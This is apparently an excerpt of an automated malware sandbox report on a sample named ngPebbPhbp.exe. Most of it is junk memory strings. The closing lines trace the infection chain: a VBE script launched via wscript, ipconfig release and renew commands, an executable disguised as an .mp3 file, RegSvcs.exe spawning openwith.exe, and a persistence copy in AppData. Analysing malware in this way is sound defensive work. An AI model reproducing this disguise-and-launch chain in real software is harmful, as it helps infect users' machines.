Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0 0'0.050<0c0k0s0[0g0p0u0{0 memstr_a712d198-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1r1~1 memstr_c395fc61-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4 4v4 memstr_fa28e3fe-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h6l6p6t6x6\6`6d6h6l6p6t6x6|6 memstr_bb9f3f13-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: th6l6p6t6x6\6`6d6h6l6p6t6x6|6 memstr_0854ec8a-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: = =v= memstr_06046888-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4d6k6 memstr_ef0f2f1b-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7"7(7c7k7 memstr_0fb0ce08-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 818?8f8l8q8 memstr_85778287-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9+939i9 memstr_356c1cb0-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :0:::f:k:p:n:x: memstr_5b2538ed-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;e;q;n<u< memstr_76d964a6-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <f=u=6> memstr_683de859-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <f=u=6>@ memstr_aba5eacc-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 708<:e: memstr_9b2f1534-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :&;c;o; memstr_c2091d3f-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;7<s=\=d= memstr_fa240811-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =3?f?b? memstr_b4862bd2-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0 010 memstr_91b128be-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1)121c1u1p1 memstr_b4159cdc-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 122d2`2 memstr_e4f6a76b-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 343`3 memstr_1efa6e40-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 343`3` memstr_9d6b6d3c-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3!4%4)4-4145494=4 memstr_b66a47d6-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4a5e5i5m5q5u5y5]5 memstr_f9082ea5-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3#3'3+3/33373;3?3c3 memstr_7d85812c-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 37:q: memstr_00f4df62-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :z;w; memstr_d99537f2-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4#414=4i4w4g4|4 memstr_60687471-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5+5?5 memstr_a32efb8e-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6c7l7w8 memstr_a283d844-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9&:+:0:k:p:u: memstr_649419c0-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1'2.2f5 memstr_508b2919-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6,737 memstr_01fff86a-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4$4y4 memstr_6f3d3471-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5'636?6 memstr_aa3abdd8-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :;o; memstr_0b3e2846-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;.<z< memstr_c39bd7b4-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t0s0x0,1 memstr_a083590e-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0t0s0x0,1 memstr_02c16202-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5j6w6 memstr_057143db-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :t<=>? memstr_54f81b9a-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5-6`6s6 memstr_dbb957cb-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 888c8p8b8 memstr_67217377-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9%9g9]9o9 memstr_f17552a0-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e:w: memstr_150f8443-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <"<b< memstr_9fdcd568-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =)=;=r= memstr_3553f69d-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >$>j>u>g> memstr_e5cc7be5-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >)?7?i?t?z? memstr_153ee7cd-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 020r0}0 memstr_c597468a-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x 020r0}0 memstr_f793fe31-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1c1}1 memstr_fc176b54-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9a:s: memstr_b4ebc3de-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >;?j? memstr_61ebf0bb-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5o5s9 memstr_74748a87-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;r;{; memstr_70d5d922-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ='>,>m>{> memstr_5eafd161-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 171d1 memstr_78cae9f4-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2d3o3 memstr_14c4bfb7-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4+5o5 memstr_b9318f87-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 516@6e6v6\6g6o6z6 memstr_1a088b01-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7 7(7@7e7l7u7 memstr_4ca57b0a-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8.8u8`8j8p8 memstr_9987e329-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;8;u;`; memstr_88ec0836-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;j<j=p= memstr_c2f793ba-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1f1w1r1~1 memstr_f4c3f1d8-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2:2k2`2j2 memstr_daa7dc4b-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3%3@3g3n3s3x3u3}3 memstr_4916f4e8-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4(474c4q4s4 memstr_755ba5ef-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5)535o5z5_5d5 memstr_3fd5f376-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6.686t6_6d6i6 memstr_41d5f798-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7,777<7a7k7 memstr_cd7fc376-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8f8j8 memstr_b14b01bb-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 949?9d9i9a9w9 memstr_96d03243-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :0:b:n: memstr_188f69ff-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <"=?>[> memstr_9e70c83f-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c6.9m9t9 memstr_ff251a10-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dc6.9m9t9 memstr_4747335c-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =)=e=w=}=->f> memstr_2e02eeca-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >#?5?k? memstr_2d3ec6ae-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j0p0m0 memstr_0c8f9b87-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0(4b4 memstr_e4c49261-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5!5[5b5 memstr_2672c3eb-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6z6g6 memstr_36168152-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6%7,7|7 memstr_c83ba159-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9=9h9x9 memstr_48adba1d-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :%:;:e:d: memstr_a11c2b2a-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;c;a; memstr_0d2ed903-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <1<m< memstr_1519ec0f-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =5=q= memstr_035fbeab-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3$4w4l4}4 memstr_b64d1c58-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5p6j7h8 memstr_9d49458d-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9*=->>> memstr_726fec3f-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9*=->>>p memstr_f9ed3717-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: !0,0<0n0 memstr_7a9f08ae-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 01h1s1{1 memstr_8c63c0b4-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2'202;2c2a2m2 memstr_ea82059f-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2d3~3 memstr_adcc4766-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 444t4 memstr_ba817732-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6d6h6q6|6 memstr_f4151f4c-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :":e: memstr_b7a6b6a3-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )0f0v0 memstr_9171b80c-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x)0f0v0 memstr_115c0909-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2-252e2v2 memstr_c5269d81-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 717p7 memstr_747a5b53-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =1=t=a=l= memstr_2790d7da-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =+>j>y> memstr_b43d2b7d-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0_01-162z2 memstr_3a129625-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 343q3e3 memstr_30b94442-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6l6l6 memstr_53332acf-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6v7`7 memstr_0ebff911-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8n8z8{8 memstr_1ea5f944-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :h:o:x:a; memstr_33d131a8-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <$<4<@<y=a=i=q= memstr_1601f670-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >%>1> memstr_fc5144e8-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0&020^0|0 memstr_1b6bafbf-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 171k1f1w1 memstr_a255694e-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2(2.2?2v2]2 memstr_5911da67-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3=3e3h3 memstr_8ef73320-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 344l4`4p4|4 memstr_efcc396b-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6d7l7 memstr_cb1d3dda-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8d8q8 memstr_6df124ac-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 859f9 memstr_e9dd11b8-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9i:u:]: memstr_11e162c4-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :#;r;z;b; memstr_c3dedbd3-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >s?{? memstr_7996104f-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0.040i0n0 memstr_0676c604-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2c2o2 memstr_044416ec-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 313<3g3m3v3 memstr_98b2114a-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 424]4u4 memstr_cae92d35-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6#7o7{7x8 memstr_02dac5b9-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: : :(:0:9:b:j:v:^:p:{: memstr_e2432466-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :*;0; memstr_313d4601-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <b<k<p<u<{< memstr_881842eb-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?&?-?3?b?i?s?]?n?u? memstr_d90bdeff-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .090f0o0d0 memstr_af7933c1-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1$141v152c2 memstr_d688f2a7-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7p8|8 memstr_fce4296b-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: : :2:n:l:v: memstr_82fb499f-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;);3;c; memstr_bfc9f289-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >->n>s>^>r>}> memstr_8be89a4d-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;>->n>s>^>r>}> memstr_7874172e-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >%?\? memstr_1e2f8d13-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1&2o2{2 memstr_44f83123-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3>4&5}5 memstr_ffc599c8-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5 6b6i6 memstr_5fd603f3-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7$717r7 memstr_f67f3509-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9'9t9 memstr_0d443c3d-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :(:::l:^:p: memstr_47b28fa3-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;!;3;l< memstr_b47d0d50-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <;=m= memstr_269e996b-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0m0c0 memstr_0248fe1c-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3\6b6 memstr_4d02dfa2-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0)101z4o5w5 memstr_5730548e-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;[<o<i? memstr_17df5fe6-b
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DBB02 SendInput,keybd_event, 7_2_003DBB02
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DEBB3 mouse_event, 7_2_003DEBB3
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
